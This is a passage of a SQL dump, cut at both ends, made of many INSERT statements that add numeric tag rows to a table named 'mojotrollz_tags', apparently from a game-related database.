0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178669, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178671, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178684, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178684, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178685, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178685, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178745, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178746, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178765, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178784, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178784, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178785, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178785, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178805, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178824, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178825, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178826, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178827, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178828, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178829, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178831, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178832, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178833, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178834, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178845, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178864, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178884, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178905, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178905, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178905, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178905, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178908, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178925, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178925, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178927, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178927, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178934, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178940, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178940, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178943, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178943, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178955, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178955, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178984, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179024, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179024, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179025, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179025, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179044, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179044, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179064, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179064, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179065, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179065, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179066, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179066, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179084, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179085, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179086, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179104, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179104, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179104, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179104, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179105, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179105, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179105, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179105, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179106, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179106, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179106, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179106, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179107, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179107, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179107, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179107, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179108, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179108, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179108, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179108, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179109, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179109, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179109, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179109, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179110, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179110, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179110, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179110, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179111, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179111, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179111, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179111, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179112, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179112, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179112, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179112, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179113, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179113, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179113, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179113, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179114, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179114, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179114, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179114, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179115, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179115, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179115, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179115, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179116, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179116, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179116, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179116, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179117, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179117, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179117, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179117, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179118, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179118, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179118, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179118, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179119, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179119, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179119, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179119, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179120, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179120, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179120, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179120, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179121, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179121, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179121, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179121, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179122, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179122, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179122, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179122, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179125, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179144, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179148, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179148, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179148, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179148, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179224, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179264, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179286, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179286, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179287, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179287, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179344, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179364, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179364, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179364, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179364, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179365, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179365, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179365, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179365, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179384, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179384, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179385, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179385, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179386, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179386, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179387, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179387, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179388, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179388, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179389, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179389, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179390, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179390, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179391, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179391, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179392, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179392, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179393, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179393, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179394, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179394, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179395, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179395, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179396, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179396, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179397, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179397, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179419, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179419, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179424, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179424, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179425, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179425, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179435, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179435, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179436, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179436, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179437, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179437, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179438, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179438, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179446, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179446, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179469, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179485, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179485, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179485, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179485, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179486, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179487, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179488, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179489, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179490, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179491, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179492, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179493, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179494, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179496, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179497, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179498, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179499, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179499, 2, 2, 1016, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179499, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179499, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179500, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179501, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179501, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179501, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179501, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179502, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179502, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179502, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179502, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179503, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179503, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179503, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179503, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179504, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179504, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179504, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179504, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179505, 2, 1, 